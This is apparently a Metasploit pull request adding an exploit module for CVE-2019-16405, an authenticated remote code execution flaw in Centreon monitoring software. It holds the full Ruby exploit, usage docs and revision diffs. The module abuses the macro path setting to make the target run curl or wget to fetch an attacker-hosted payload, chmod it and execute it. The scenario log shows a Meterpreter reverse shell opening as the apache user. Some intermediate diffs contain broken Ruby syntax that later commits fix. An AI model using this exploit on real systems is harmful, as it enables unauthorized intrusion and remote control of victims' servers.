### PR TITLE
Add CVE-2019-16405 Centreon 19.4 exploit.

### DIFF
--- a/documentation/modules/exploit/linux/http/centreon_cmd_exec.md
+++ b/documentation/modules/exploit/linux/http/centreon_cmd_exec.md
@@ -1,0 +1,53 @@
+## Vulnerable Application
+
+1. [Vendor site](https://download.centreon.com/)
+2. [TheCyberGeek's walkthrough](https://thecybergeek.co.uk/cves/2019/09/19/CVEs.html)
+
+### Creating A Testing Environment
+Download either the OVA/OVF from https://download.centreon.com/ selecting appliances then version 18.10. 
+Import OVF on virtual machine.
+
+## Verification
+Do:
+1. use exploit/linux/http/centreon_cmd_exec
+2. set RHOST target_ip
+3. set LHOST your_ip
+4. set TARGETURI /centreon
+5. set USERNAME login_username
+6. set PASSWORD login_password
+7. exploit
+
+## Options
+Alternative options if needed.<br>
+set HTTPDELAY 10<br>
+The number of seconds the web server will wait before termination
+
+set METHOD curl/wget<br>
+The method used to download shell from target (default is curl)
+
+## Scenario
+For testing we use the default web credentials admin:centreon
+```
+root@TheCyberGeek:~/# msfconsole
+msf5 > use exploit/linux/http/centreon_cmd_exec
+msf5 exploit(linux/http/centreon_cmd_exec) >  set RHOST 192.168.0.47
+msf5 exploit(linux/http/centreon_cmd_exec) >  set LHOST 192.168.0.12
+msf5 exploit(linux/http/centreon_cmd_exec) >  set LPORT 4444
+msf5 exploit(linux/http/centreon_cmd_exec) >  set TARGETURI /centreon
+msf5 exploit(linux/http/centreon_cmd_exec) >  set USERNAME admin
+msf5 exploit(linux/http/centreon_cmd_exec) >  set PASSWORD centreon
+msf5 exploit(linux/http/centreon_cmd_exec) >  exploit
+[ * ] Started reverse TCP handler on 192.168.0.12:4444
+[ * ] Successfully got token 7aded091b8d304333bca634dc654fcb4
+[ * ] Using URL: http://0.0.0.0:80/jtDFPIxG
+[ * ] Local IP: http://192.168.0.12:80/jtDFPIxG
+[ * ] Server started.
+[ + ] 192.168.0.47:80 - Payload request received: /jtDFPIxG
+[ * ] Sending Stage (985320 bytes) to 182.168.0.47
+[ * ] Meterpreter session 3 opened (192.168.0.12:4444 -> 192.168.0.47:57338) at 2020-01-16 13:30:23 +0100
+[ + ] timeout
+[ * ] Server stopped. 
+meterpreter > getuid
+uid=48(apache) gid=48(apache) groups=48(apache),993(centreon-engine),994(centreon-broker),998(centreon),999(nagios)
+```
+

--- a/modules/exploits/linux/http/centreon_authenticated_macro_expression_location_setting_handler_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_authenticated_macro_expression_location_setting_handler_cmd_exec.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
         OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
         OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
-        OptString.new("METHOD", [true, "The method used to download shell from target (default is curl)", "curl"]),
+        OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]),
         OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
       ]
     )

--- a/modules/exploits/linux/http/centreon_authenticated_macro_expression_location_setting_handler_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_authenticated_macro_expression_location_setting_handler_cmd_exec.rb
@@ -23,8 +23,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         "License" => MSF_LICENSE,
         'Author' => [
-          'enjloezz & TheCyberGeek', # Discovery
-          'enjloezz' # Metasploit Module
+          'TheCyberGeek', # Discovery
+          'enjloezz' # Discovery and Metasploit Module
         ],
         'References' =>
         [
@@ -64,49 +64,59 @@ class MetasploitModule < Msf::Exploit::Remote
       @phpsessid = res.get_cookies
       /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
 
-      if token
-        res = send_request_cgi!(
-          "uri" => normalize_uri(target_uri.path, "index.php"),
-          "method" => "POST",
-          "cookie" => @phpsessid,
-          "vars_post" => {
-            "useralias" => datastore["USERNAME"],
-            "password" => datastore["PASSWORD"],
-            "centreon_token" => token,
-          },
-        )
-        if res.body.include? "You need to enable JavaScript to run this app"
-          print_good("Login Successful!")
-          res = send_request_cgi(
-            "uri" => normalize_uri(target_uri.path, "main.get.php"),
-            "method" => "GET",
-            "cookie" => @phpsessid,
-            "vars_get" => {
-              "p" => "60904",
-              "o" => "c",
-              "resource_id" => 1,
-            },
-          )
-          /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
-          res = send_request_cgi(
-            "uri" => normalize_uri(target_uri.path, "main.get.php"),
-            "vars_get" => {
-              "p" => "60904",
-              },
-            "method" => "POST",
-            "cookie" => @phpsessid,
-            "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token },
-          )
-          begin
-            Timeout.timeout(datastore["HTTPDELAY"]) { super }
-          rescue Timeout::Error
-            vprint_error("Server Timed Out...")
-          end
-        else
-          vprint_error("Cannot login to Centreon")
-        end
-      else
+      unless token
         vprint_error("Couldn't get token, check your TARGETURI")
+        return
+      end
+      res = send_request_cgi!(
+      "uri" => normalize_uri(target_uri.path, "index.php"),
+      "method" => "POST",
+      "cookie" => @phpsessid,
+      "vars_post" => {
+        "useralias" => datastore["USERNAME"],
+        "password" => datastore["PASSWORD"],
+        "centreon_token" => token,
+        },
+      )
+      unless res.body.include? "You need to enable JavaScript to run this app"
+        fail_with Failure::NoAccess "Cannot login to Centreon"
+      end
+      print_good("Login Successful!")
+      res = send_request_cgi(
+        "uri" => normalize_uri(target_uri.path, "main.get.php"),
+        "method" => "GET",
+        "cookie" => @phpsessid,
+        "vars_get" => {
+          "p" => "60904",
+          "o" => "c",
+          "resource_id" => 1,
+        },
+      )
+      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
+      res = send_request_cgi(
+        "uri" => normalize_uri(target_uri.path, "main.get.php"),
+        "vars_get" => {
+          "p" => "60904",
+          },
+        "method" => "POST",
+        "cookie" => @phpsessid,
+        "vars_post" => {
+          "resource_name": "$USER1$",
+          "resource_line": "/",
+          "instance_id": 1,
+          "resource_activate": 1,
+          "resource_comment": "Nagios Plugins Path",
+          "submitC": "Save",
+          "resource_id": 1,
+          "o": "c",
+          "initialValues": "" "a:0:{}" "",
+          "centreon_token": token
+        },
+      )
+      begin
+        Timeout.timeout(datastore["HTTPDELAY"]) { super }
+      rescue Timeout::Error
+        vprint_error("Server Timed Out...")
       end
     rescue ::Rex::ConnectionError
       vprint_error("Connection error...")

--- a/modules/exploits/linux/http/centreon_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_cmd_exec.rb
@@ -1,0 +1,172 @@
+####################################################################
+# This module requires Metasploit: https://metasploit.com/download #
+#  Current source: https://github.com/rapid7/metasploit-framework  #
+####################################################################
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+        "Name" => "Centreon Authenicated Remote Code Execution",
+        "Description" =>  %q{
+          Authenticated Remote Code Execution on Centreon Web Appliances.
+          Affected versions: =< 18.10, 19.04
+          By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache.
+          Vendor verified: 09/17/2019
+          Vendor patched: 10/16/2019
+          Public disclosure: 10/18/2019
+        },
+        "License" => MSF_LICENSE,
+        'Author' => [
+          'enjloezz & TheCyberGeek', # Discovery
+          'enjloezz' # Metasploit Module
+        ],
+        'References' =>
+        [
+  			  ['URL','https://github.com/centreon/centreon/pull/7864'],
+	  		  ['CVE','2019-16405']
+        ],
+        "Platform" => "linux",
+        "Targets" => [
+          ["Centreon", {}],
+        ],
+        "Stance" => Msf::Exploit::Stance::Aggressive,
+        "Privileged" => false,
+        "DisclosureDate" => "Oct 19 2019",
+        "DefaultOptions" => {
+          "SRVPORT" => 80,
+        },
+        "DefaultTarget" => 0
+      ))
+
+    register_options(
+      [
+        OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
+        OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
+        OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
+        OptString.new("METHOD", [true, "The method used to download shell from target (default is curl)", "curl"]),
+        OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
+      ]
+    )
+  end
+
+  def exploit
+    begin
+      res = send_request_cgi(
+        "uri" => normalize_uri(target_uri.path, "index.php"),
+        "method" => "GET",
+      )
+      @phpsessid = res.get_cookies
+      /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
+
+      if token
+        res = send_request_cgi!(
+          "uri" => normalize_uri(target_uri.path, "index.php"),
+          "method" => "POST",
+          "cookie" => @phpsessid,
+          "vars_post" => {
+            "useralias" => datastore["USERNAME"],
+            "password" => datastore["PASSWORD"],
+            "centreon_token" => token,
+          },
+        )
+        if res.body.include? "You need to enable JavaScript to run this app"
+          print_good("Login Successful!")
+          res = send_request_cgi(
+            "uri" => normalize_uri(target_uri.path, "main.get.php"),
+            "method" => "GET",
+            "cookie" => @phpsessid,
+            "vars_get" => {
+              "p" => "60904",
+              "o" => "c",
+              "resource_id" => 1,
+            },
+          )
+          /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
+          res = send_request_cgi(
+            "uri" => normalize_uri(target_uri.path, "main.get.php", "?p=60904"),
+            "method" => "POST",
+            "cookie" => @phpsessid,
+            "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token },
+          )
+          begin
+            Timeout.timeout(datastore["HTTPDELAY"]) { super }
+          rescue Timeout::Error
+            vprint_error("Server Timed Out...")
+          end
+        else
+          vprint_error("Cannot login to Centreon")
+        end
+      else
+        vprint_error("Couldn't get token, check your TARGETURI")
+      end
+    rescue ::Rex::ConnectionError
+      vprint_error("Connection error...")
+    end
+  end
+
+  def primer
+    @pl = generate_payload_exe
+    @path = service.resources.keys[0]
+    binding_ip = srvhost_addr
+
+    proto = datastore["SSL"] ? "https" : "http"
+    payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
+    send_payload(payload_uri)
+  end
+
+  def send_payload(payload_uri)
+    payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\""
+    print_good("Sending Payload")
+    res = send_request_cgi(
+      "uri" => normalize_uri(target_uri.path, "main.get.php"),
+      "method" => "POST",
+      "cookie" => @phpsessid,
+      "vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
+    )
+  end
+
+  def on_request_uri(cli, req)
+    print_good("#{peer} - Payload request received: #{req.uri}")
+    send_response(cli, @pl)
+    run_shell
+    stop_service
+  end
+
+  def run_shell
+    print_good("Setting permissions for the payload")
+    res = send_request_cgi(
+      "uri" => normalize_uri(target_uri.path, "main.get.php"),
+      "method" => "POST",
+      "cookie" => @phpsessid,
+      "vars_get" => {
+        "p": "60801",
+        "command_hostaddress": "",
+        "command_example": "",
+        "command_line": "/bin/bash -c \"chmod 777 /tmp/#{@path}\"",
+        "o": "p",
+        "min": 1,
+      },
+    )
+
+    print_good("Executing Payload")
+    res = send_request_cgi(
+      "uri" => normalize_uri(target_uri.path, "main.get.php"),
+      "method" => "POST",
+      "cookie" => @phpsessid,
+      "vars_get" => {
+        "p": "60801",
+        "command_hostaddress": "",
+        "command_example": "",
+        "command_line": "/tmp/#{@path}",
+        "o": "p",
+        "min": 1,
+      },
+    )
+  end
+end

--- a/modules/exploits/linux/http/centreon_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_cmd_exec.rb
@@ -28,8 +28,8 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' =>
         [
-  			  ['URL','https://github.com/centreon/centreon/pull/7864'],
-	  		  ['CVE','2019-16405']
+            ['URL','https://github.com/centreon/centreon/pull/7864'],
+            ['CVE','2019-16405']
         ],
         "Platform" => "linux",
         "Targets" => [
@@ -89,7 +89,12 @@ class MetasploitModule < Msf::Exploit::Remote
           )
           /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
           res = send_request_cgi(
-            "uri" => normalize_uri(target_uri.path, "main.get.php", "?p=60904"),
+            "uri" => normalize_uri(target_uri.path,
+            "vars_get" => {
+                "main.get.php",
+                "?p=60904"
+                },
+            ),
             "method" => "POST",
             "cookie" => @phpsessid,
             "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token },

--- a/modules/exploits/linux/http/centreon_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_cmd_exec.rb
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def send_payload(payload_uri)
     payload = "/bin/bash -c \"" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}\""
     print_good("Sending Payload")
-    res = send_request_cgi(
+    send_request_cgi(
       "uri" => normalize_uri(target_uri.path, "main.get.php"),
       "method" => "POST",
       "cookie" => @phpsessid,

--- a/modules/exploits/linux/http/centreon_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_cmd_exec.rb
@@ -89,11 +89,10 @@ class MetasploitModule < Msf::Exploit::Remote
           )
           /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
           res = send_request_cgi(
-            "uri" => normalize_uri(target_uri.path,
+            "uri" => normalize_uri(target_uri.path, "main.get.php),
             "vars_get" => {
-                "main.get.php",
-                "?p=60904"
-                },
+              "p" => "60904",
+              },
             ),
             "method" => "POST",
             "cookie" => @phpsessid,

--- a/modules/exploits/linux/http/centreon_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_cmd_exec.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
           )
           /centreon_token\".*value=\"(?<token>.*?)\"/ =~ res.body
           res = send_request_cgi(
-            "uri" => normalize_uri(target_uri.path, "main.get.php),
+            "uri" => normalize_uri(target_uri.path, "main.get.php"),
             "vars_get" => {
               "p" => "60904",
               },

--- a/modules/exploits/linux/http/centreon_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_cmd_exec.rb
@@ -93,7 +93,6 @@ class MetasploitModule < Msf::Exploit::Remote
             "vars_get" => {
               "p" => "60904",
               },
-            ),
             "method" => "POST",
             "cookie" => @phpsessid,
             "vars_post" => { "resource_name": "$USER1$", "resource_line": "/", "instance_id": 1, "resource_activate": 1, "resource_comment": "Nagios Plugins Path", "submitC": "Save", "resource_id": 1, "o": "c", "initialValues": "" "a:0:{}" "", "centreon_token": token },

--- a/modules/exploits/linux/http/centreon_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_cmd_exec.rb
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @path = service.resources.keys[0]
     binding_ip = srvhost_addr
 
-    proto = datastore["SSL"] ? "https" : "http"
+    proto = ssl ? "https" : "http"
     payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
     send_payload(payload_uri)
   end

--- a/modules/exploits/linux/http/centreon_cmd_exec.rb
+++ b/modules/exploits/linux/http/centreon_cmd_exec.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-        "Name" => "Centreon Authenicated Remote Code Execution",
+        "Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",
         "Description" =>  %q{
           Authenticated Remote Code Execution on Centreon Web Appliances.
           Affected versions: =< 18.10, 19.04


### PR DESCRIPTION
Add CVE-2019-16405 Centreon 19.4 exploit.

```
CVE-2019-16405
Centreon Infrastructure Monitor Authenticated Remote Code Execution.
This module exploits Centreon Infrastructure Montor versions 18.01 and 19.04 
by abusing command execution functions allowing us to execute code as apache user.

Tested on: 
Ubuntu 14.04
Centos 7
```

Exploit walkthrough: https://thecybergeek.co.uk/cves/2019/09/19/CVEs.html


## Verification
Do:
1. use exploit/linux/http/centreon_cmd_exec
2. set RHOST target_ip
3. set LHOST your_ip
4. set TARGETURI /centreon
5. set USERNAME login_username
6. set PASSWORD login_password
7. exploit

## Options
Alternative options if needed.
set HTTPDELAY 10
The number of seconds the web server will wait before termination

set METHOD curl/wget
The method used to download shell from target (default is curl)

## Scenario
```
root@TheCyberGeek:~/# msfconsole
msf5 > use exploit/linux/http/centreon_cmd_exec
msf5 exploit(linux/http/centreon_cmd_exec) >  set RHOST 192.168.0.47
msf5 exploit(linux/http/centreon_cmd_exec) >  set LHOST 192.168.0.12
msf5 exploit(linux/http/centreon_cmd_exec) >  set LPORT 4444
msf5 exploit(linux/http/centreon_cmd_exec) >  set TARGETURI /centreon
msf5 exploit(linux/http/centreon_cmd_exec) >  set USERNAME admin
msf5 exploit(linux/http/centreon_cmd_exec) >  set PASSWORD centreon
msf5 exploit(linux/http/centreon_cmd_exec) >  exploit

[ * ] Started reverse TCP handler on 192.168.0.12:4444
[ * ] Successfully got token 7aded091b8d304333bca634dc654fcb4
[ * ] Using URL: http://0.0.0.0:80/jtDFPIxG
[ * ] Local IP: http://192.168.0.12:80/jtDFPIxG
[ * ] Server started.
[ + ] 192.168.0.47:80 - Payload request received: /jtDFPIxG
[ * ] Sending Stage (985320 bytes) to 192.168.0.47
[ * ] Meterpreter session 3 opened (192.168.0.12:4444 -> 192.168.0.47:57338) at 2020-01-16 13:30:23 +0100
[ + ] timeout
[ * ] Server stopped. 

meterpreter > getuid
uid=48(apache) gid=48(apache) groups=48(apache),993(centreon-engine),994(centreon-broker),998(centreon),999(nagios)
```


